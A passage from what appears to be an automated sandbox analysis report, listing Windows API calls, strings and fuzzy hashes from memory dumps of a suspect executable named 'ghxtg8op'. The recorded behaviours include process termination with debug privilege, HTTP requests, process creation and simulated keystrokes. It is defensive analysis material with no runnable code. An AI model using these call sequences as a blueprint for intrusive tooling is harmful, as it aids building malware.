                            • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 00DA121A
                            • GetWindowThreadProcessId.USER32(?,00000000), ref: 00DA122C
                            • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 00DA1245
                            • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 00DA1257
                            • AttachThreadInput.USER32(00000000,00000000), ref: 00DA129C
                            • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 00DA12B1
                            • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 00DA12BC
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                            • String ID:
                            • API String ID: 2156557900-0
                            • Opcode ID: a15d61d79dd1a26c24146d532c94150497c1054ba226b32043e3b861359b1e4d
                            • Instruction ID: 32b456dc66ed3a092e6983f54680c82de4b1ba539004c9516617be77688544f7
                            • Opcode Fuzzy Hash: a15d61d79dd1a26c24146d532c94150497c1054ba226b32043e3b861359b1e4d
                            • Instruction Fuzzy Hash: F031FD79600306BFEF209F91EC8AFA937AAEB56351F144125F900E62A0D3B5DD848B74
                            APIs
                            • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00D4FAA6
                            • OleUninitialize.OLE32(?,00000000), ref: 00D4FB45
                            • UnregisterHotKey.USER32(?), ref: 00D4FC9C
                            • DestroyWindow.USER32 ref: 00D845D6
                            • FreeLibrary.KERNEL32(?), ref: 00D8463B
                            • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00D84668
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                            • String ID: close all
                            • API String ID: 469580280-3243417748
                            • Opcode ID: 5c34802374aec9a3a384b2b895ee68145f042b4fdd111b8f6e95c6d6a628d41f
                            • Instruction ID: 77c5bd3d5ffcec8b1f4deb3a6addc9530fab5a16a17dbb81bd24b1a97ba757bd
                            • Opcode Fuzzy Hash: 5c34802374aec9a3a384b2b895ee68145f042b4fdd111b8f6e95c6d6a628d41f
                            • Instruction Fuzzy Hash: 98A14A347012128FCB29EF14C995A69F7A5EF15710F5842ADE84AAB262DB30ED16CF70
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: ChildEnumWindows
                            • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                            • API String ID: 3555792229-1603158881
                            • Opcode ID: e072b5a2d993f08b8232fcb88f7a26f06bcb46dbbe12541feea907b0ac6d6afd
                            • Instruction ID: 3a492825e818e09f81eaa22b2150c1b8d93dd78dff508289ee921483cec41269
                            • Opcode Fuzzy Hash: e072b5a2d993f08b8232fcb88f7a26f06bcb46dbbe12541feea907b0ac6d6afd
                            • Instruction Fuzzy Hash: C0918332600606ABCF08DFA8C442BEEFB75FF04340F548119E999A7251DB31A999DBF1
                            APIs
                            • SetWindowLongW.USER32(?,000000EB,?,?,000000FF,?,000000FF), ref: 00D42EAE
                              • Part of subcall function 00D41DB3: GetClientRect.USER32(?,?), ref: 00D41DDC
                              • Part of subcall function 00D41DB3: GetWindowRect.USER32(?,?), ref: 00D41E1D
                              • Part of subcall function 00D41DB3: ScreenToClient.USER32(?,?), ref: 00D41E45
                            • GetDC.USER32 ref: 00D7CD32
                            • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00D7CD45
                            • SelectObject.GDI32(00000000,00000000), ref: 00D7CD53
                            • SelectObject.GDI32(00000000,00000000), ref: 00D7CD68
                            • ReleaseDC.USER32(?,00000000), ref: 00D7CD70
                            • MoveWindow.USER32(?,?,?,?,?,?), ref: 00D7CDFB
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                            • String ID: U
                            • API String ID: 4009187628-3372436214
                            • Opcode ID: 7411c81444f5bd71e9902c6622ca9a26ae37a6067c0575816670619aabc1a157
                            • Instruction ID: 1436b68ed8b7e24c76e68d9a24bb7e6d4b6ed09e5182cd0f6b9cdacefffd0b48
                            • Opcode Fuzzy Hash: 7411c81444f5bd71e9902c6622ca9a26ae37a6067c0575816670619aabc1a157
                            • Instruction Fuzzy Hash: 8B717F31510205DFCF258F64C884ABA7BB5FF48360F18927AFD599A2A6E7319881DB70
                            APIs
                            • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00DB1A50
                            • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 00DB1A7C
                            • InternetQueryOptionW.WININET(00000000,0000001F,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00DB1ABE
                            • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 00DB1AD3
                            • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00DB1AE0
                            • HttpQueryInfoW.WININET(00000000,00000005,?,?,00000000), ref: 00DB1B10
                            • InternetCloseHandle.WININET(00000000), ref: 00DB1B57
                              • Part of subcall function 00DB2483: GetLastError.KERNEL32(?,?,00DB1817,00000000,00000000,00000001), ref: 00DB2498
                              • Part of subcall function 00DB2483: SetEvent.KERNEL32(?,?,00DB1817,00000000,00000000,00000001), ref: 00DB24AD
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: Internet$Http$OptionQueryRequest$CloseConnectErrorEventHandleInfoLastOpenSend
                            • String ID:
                            • API String ID: 2603140658-3916222277
                            • Opcode ID: ce56cd44a7d68e336512c4d4db0d6e47cc99c534ba488619ee4c7d01cb739a97
                            • Instruction ID: db4762155b8827104024eeeb8aef978061f696b1236156f6b75bf5f5de43235f
                            • Opcode Fuzzy Hash: ce56cd44a7d68e336512c4d4db0d6e47cc99c534ba488619ee4c7d01cb739a97
                            • Instruction Fuzzy Hash: 5D418CB5501219FFEB118F50CC99FFA7BADEF09354F04412AF9069A281E7709E458BB4
                            APIs
                            • GetModuleFileNameW.KERNEL32(?,?,00000104,?,00DCF910), ref: 00DB8D28
                            • FreeLibrary.KERNEL32(00000000,00000001,00000000,?,00DCF910), ref: 00DB8D5C
                            • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 00DB8ED6
                            • SysFreeString.OLEAUT32(?), ref: 00DB8F00
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: Free$FileLibraryModuleNamePathQueryStringType
                            • String ID:
                            • API String ID: 560350794-0
                            • Opcode ID: c87c8859e5e10f966d79d4aa0f9438cd602e5a9440d31f8623ab17c0bc1aefa5
                            • Instruction ID: 06c0c572fcf0882f58ed81aa2b05c7f331755e3857c12e2d07a1d1aee5a95172
                            • Opcode Fuzzy Hash: c87c8859e5e10f966d79d4aa0f9438cd602e5a9440d31f8623ab17c0bc1aefa5
                            • Instruction Fuzzy Hash: 90F1E671A00209EFDB14EF94C884EEEB7B9FF49315F148458F906AB251DB31AE46DB60
                            APIs
                            • _memset.LIBCMT ref: 00DBF6B5
                            • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00DBF848
                            • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00DBF86C
                            • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00DBF8AC
                            • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00DBF8CE
                            • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00DBFA4A
                            • GetLastError.KERNEL32(00000000,00000001,00000000), ref: 00DBFA7C
                            • CloseHandle.KERNEL32(?), ref: 00DBFAAB
                            • CloseHandle.KERNEL32(?), ref: 00DBFB22
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
                            • String ID:
                            • API String ID: 4090791747-0
                            • Opcode ID: 2d28d8a8422fbcc7701a69a18f98ca7e1cb3ee42c0bd92d15a083fcd9adc7199
                            • Instruction ID: 328db561c56354810e104be6d021fc3d6048962b476b109c153bb640fe7bbe99
                            • Opcode Fuzzy Hash: 2d28d8a8422fbcc7701a69a18f98ca7e1cb3ee42c0bd92d15a083fcd9adc7199
                            • Instruction Fuzzy Hash: A6E16031604341DFCB14DF25C891AAABBE1EF85354F18896DF8969B2A2CB31DC45CB72
                            APIs
                              • Part of subcall function 00DA466E: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00DA3697,?), ref: 00DA468B
                              • Part of subcall function 00DA466E: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00DA3697,?), ref: 00DA46A4
                              • Part of subcall function 00DA4A31: GetFileAttributesW.KERNEL32(?,00DA370B), ref: 00DA4A32
                            • lstrcmpiW.KERNEL32(?,?), ref: 00DA4D40
                            • _wcscmp.LIBCMT ref: 00DA4D5A
                            • MoveFileW.KERNEL32 ref: 00DA4D75
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
                            • String ID:
                            • API String ID: 793581249-0
                            • Opcode ID: b17d7c069ad87226e69158e1d5515254e86ff1eac278f3834b6b6d4c86c7e776
                            • Instruction ID: e836925241a2097c2f34028831244311fce8ba6b4f702f0958ec3b04ce161c93
                            • Opcode Fuzzy Hash: b17d7c069ad87226e69158e1d5515254e86ff1eac278f3834b6b6d4c86c7e776
                            • Instruction Fuzzy Hash: 145151B24083859BC764DB64D8819DFB3ECEF85350F04092EB689D3152EF74A688CB76
                            APIs
                            • InvalidateRect.USER32(?,00000000,00000001), ref: 00DC86FF
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: InvalidateRect
                            • String ID:
                            • API String ID: 634782764-0
                            • Opcode ID: f73c2107a23d658d9485d2676b70a8175f64d06b466898c9253fb9de03480412
                            • Instruction ID: 0324e5a48c1253af75a23c1a287f78322ab00a2fd23884c998172a74a967c241
                            • Opcode Fuzzy Hash: f73c2107a23d658d9485d2676b70a8175f64d06b466898c9253fb9de03480412
                            • Instruction Fuzzy Hash: 7051B030540246BFEB209B68DC89FA97B65EF05320F64411AF951E76E0DF71E980EB70
                            APIs
                            • LoadImageW.USER32 ref: 00D7C2F7
                            • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00D7C319
                            • LoadImageW.USER32 ref: 00D7C331
                            • ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 00D7C34F
                            • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 00D7C370
                            • DestroyIcon.USER32(00000000), ref: 00D7C37F
                            • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 00D7C39C
                            • DestroyIcon.USER32(?), ref: 00D7C3AB
                              • Part of subcall function 00DCA4AF: DeleteObject.GDI32(00000000), ref: 00DCA4E8
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            Similarity
                            • API ID: Icon$DestroyExtractImageLoadMessageSend$DeleteObject
                            • String ID:
                            • API String ID: 2819616528-0
                            APIs
                              • Part of subcall function 00D9A82C: GetWindowThreadProcessId.USER32(?,00000000), ref: 00D9A84C
                              • Part of subcall function 00D9A82C: GetCurrentThreadId.KERNEL32(00000000,?,00D99683,?,00000001), ref: 00D9A853
                              • Part of subcall function 00D9A82C: AttachThreadInput.USER32(00000000,?,00D99683), ref: 00D9A85A
                            • MapVirtualKeyW.USER32(00000025,00000000), ref: 00D9968E
                            • PostMessageW.USER32 ref: 00D996AB
                            • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000,?,00000001), ref: 00D996AE
                            • MapVirtualKeyW.USER32(00000025,00000000), ref: 00D996B7
                            • PostMessageW.USER32 ref: 00D996D5
                            • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 00D996D8
                            • MapVirtualKeyW.USER32(00000025,00000000), ref: 00D996E1
                            • PostMessageW.USER32 ref: 00D996F8
                            • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 00D996FB
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            Similarity
                            • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                            • String ID:
                            • API String ID: 2014098862-0
                            APIs
                            • GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,00D9853C,00000B00,?,?), ref: 00D9892A
                            • HeapAlloc.KERNEL32(00000000,?,00D9853C,00000B00,?,?), ref: 00D98931
                            • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00D9853C,00000B00,?,?), ref: 00D98946
                            • GetCurrentProcess.KERNEL32(?,00000000,?,00D9853C,00000B00,?,?), ref: 00D9894E
                            • DuplicateHandle.KERNEL32 ref: 00D98951
                            • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,00D9853C,00000B00,?,?), ref: 00D98961
                            • GetCurrentProcess.KERNEL32(00D9853C,00000000,?,00D9853C,00000B00,?,?), ref: 00D98969
                            • DuplicateHandle.KERNEL32 ref: 00D9896C
                            • CreateThread.KERNEL32(00000000,00000000,00D98992,00000000,00000000,00000000), ref: 00D98986
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            Similarity
                            • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                            • String ID:
                            • API String ID: 1957940570-0
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            Similarity
                            • API ID:
                            • String ID: NULL Pointer assignment$Not an Object type
                            • API String ID: 0-572801152
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            Similarity
                            • API ID: Variant$ClearInit$_memset
                            • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                            • API String ID: 2862541840-625585964
                            APIs
                              • Part of subcall function 00D9710A: CLSIDFromProgID.OLE32 ref: 00D97127
                              • Part of subcall function 00D9710A: ProgIDFromCLSID.OLE32(?,00000000), ref: 00D97142
                              • Part of subcall function 00D9710A: lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00D97044,80070057,?,?), ref: 00D97150
                              • Part of subcall function 00D9710A: CoTaskMemFree.OLE32(00000000), ref: 00D97160
                            • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000), ref: 00DB9806
                            • _memset.LIBCMT ref: 00DB9813
                            • _memset.LIBCMT ref: 00DB9956
                            • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,00000000), ref: 00DB9982
                            • CoTaskMemFree.OLE32(?), ref: 00DB998D
                            Strings
                            • NULL Pointer assignment, xrefs: 00DB99DB
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            Similarity
                            • API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
                            • String ID: NULL Pointer assignment
                            • API String ID: 1300414916-2785691316
                            APIs
                            • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00DC6E24
                            • SendMessageW.USER32(?,00001036,00000000,?), ref: 00DC6E38
                            • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00DC6E52
                            • _wcscat.LIBCMT ref: 00DC6EAD
                            • SendMessageW.USER32(?,00001057,00000000,?), ref: 00DC6EC4
                            • SendMessageW.USER32(?,00001061,?,0000000F), ref: 00DC6EF2
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            Similarity
                            • API ID: MessageSend$Window_wcscat
                            • String ID: SysListView32
                            • API String ID: 307300125-78025650
                            APIs
                              • Part of subcall function 00DA3C55: CreateToolhelp32Snapshot.KERNEL32 ref: 00DA3C7A
                              • Part of subcall function 00DA3C55: Process32FirstW.KERNEL32(00000000,?), ref: 00DA3C88
                              • Part of subcall function 00DA3C55: CloseHandle.KERNEL32(00000000), ref: 00DA3D52
                            • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00DBE9A4
                            • GetLastError.KERNEL32 ref: 00DBE9B7
                            • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00DBE9E6
                            • TerminateProcess.KERNEL32(00000000,00000000), ref: 00DBEA63
                            • GetLastError.KERNEL32(00000000), ref: 00DBEA6E
                            • CloseHandle.KERNEL32(00000000), ref: 00DBEAA3
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            Similarity
                            • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                            • String ID: SeDebugPrivilege
                            • API String ID: 2533919879-2896544425
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            Similarity
                            • API ID: IconLoad
                            • String ID: blank$info$question$stop$warning
                            • API String ID: 2457776203-404129466
                            APIs
                            • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00DA4312
                            • LoadStringW.USER32(00000000), ref: 00DA4319
                            • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00DA432F
                            • LoadStringW.USER32(00000000), ref: 00DA4336
                            • _wprintf.LIBCMT ref: 00DA435C
                            • MessageBoxW.USER32 ref: 00DA437A
                            Strings
                            • %s (%d) : ==> %s: %s %s, xrefs: 00DA4357
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            Similarity
                            • API ID: HandleLoadModuleString$Message_wprintf
                            • String ID: %s (%d) : ==> %s: %s %s
                            • API String ID: 3648134473-3128320259
                            APIs
                              • Part of subcall function 00D42612: GetWindowLongW.USER32(?,000000EB), ref: 00D42623
                            • GetSystemMetrics.USER32(0000000F), ref: 00DCD47C
                            • GetSystemMetrics.USER32(0000000F), ref: 00DCD49C
                            • MoveWindow.USER32(00000003,?,?,?,?,00000000), ref: 00DCD6D7
                            • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 00DCD6F5
                            • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 00DCD716
                            • ShowWindow.USER32(00000003,00000000), ref: 00DCD735
                            • InvalidateRect.USER32(?,00000000,00000001), ref: 00DCD75A
                            • DefDlgProcW.USER32(?,00000005,?,?), ref: 00DCD77D
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            Similarity
                            • API ID: Window$MessageMetricsSendSystem$InvalidateLongMoveProcRectShow
                            • String ID:
                            • API String ID: 1211466189-0
                            APIs
                            • ShowWindow.USER32(FFFFFFFF,?), ref: 00D42ACF
                            • ShowWindow.USER32(FFFFFFFF,00000000), ref: 00D42B17
                            • ShowWindow.USER32(FFFFFFFF,00000006), ref: 00D7C21A
                            • ShowWindow.USER32(FFFFFFFF,?), ref: 00D7C286
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            Similarity
                            • API ID: ShowWindow
                            • String ID:
                            • API String ID: 1268545403-0
                            APIs
                            • InterlockedExchange.KERNEL32(?,000001F5), ref: 00DA70DD
                              • Part of subcall function 00D60DB6: std::exception::exception.LIBCMT ref: 00D60DEC
                              • Part of subcall function 00D60DB6: __CxxThrowException@8.LIBCMT ref: 00D60E01
                            • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 00DA7114
                            • EnterCriticalSection.KERNEL32(?), ref: 00DA7130
                            • _memmove.LIBCMT ref: 00DA717E
                            • _memmove.LIBCMT ref: 00DA719B
                            • LeaveCriticalSection.KERNEL32(?), ref: 00DA71AA
                            • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 00DA71BF
                            • InterlockedExchange.KERNEL32(?,000001F6), ref: 00DA71DE
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            Similarity
                            • API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterException@8LeaveThrowstd::exception::exception
                            • String ID:
                            • API String ID: 256516436-0
                            APIs
                            • DeleteObject.GDI32(00000000), ref: 00DC61EB
                            • GetDC.USER32(00000000), ref: 00DC61F3
                            • GetDeviceCaps.GDI32(00000000,0000005A,?,?,00DC902A,?,?,000000FF,00000000,?,000000FF,?,00000001,?), ref: 00DC61FE
                            • ReleaseDC.USER32(00000000,00000000), ref: 00DC620A
                            • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 00DC6246
                            • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00DC6257
                            • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00DC6291
                            • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00DC62B1
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            Similarity
                            • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                            • String ID:
                            • API String ID: 3864802216-0
                            • Opcode ID: 7559598e58bdac09fc9dd2eab40882c06668a2b9a031ed044e680552be4f5771
                            • Instruction ID: 90b88c31c9f1abc8a42c25961780ddc25d32645c52874032504a0de98e5bf2ce
                            • Opcode Fuzzy Hash: 7559598e58bdac09fc9dd2eab40882c06668a2b9a031ed044e680552be4f5771
                            • Instruction Fuzzy Hash: E3314C72241216BFEF118F50CC8AFEA3BAAEF49765F084065FE48DA291C6759C41CB74
                            APIs
                            Similarity
                            • API ID: _memcmp
                            • String ID:
                            • API String ID: 2931989736-0
                            • Opcode ID: 4901d27a6f65e45537e52302430d8c2d9d3f590fd0b760dbbb39b852e37ee46a
                            • Instruction ID: e9e8d1cfc6ff228836bbbeea3522f9e7138d9ca46aafb5331fcc36a6b4027b6f
                            • Opcode Fuzzy Hash: 4901d27a6f65e45537e52302430d8c2d9d3f590fd0b760dbbb39b852e37ee46a
                            • Instruction Fuzzy Hash: 5521A1A16012057BAB046621AE42FBB775DDE603ACF0E4023FD0497687EF64EE1582B1
                            APIs
                              • Part of subcall function 00D49837: __itow.LIBCMT ref: 00D49862
                              • Part of subcall function 00D49837: __swprintf.LIBCMT ref: 00D498AC
                              • Part of subcall function 00D5FC86: _wcscpy.LIBCMT ref: 00D5FCA9
                            • _wcstok.LIBCMT ref: 00DAEC94
                            • _wcscpy.LIBCMT ref: 00DAED23
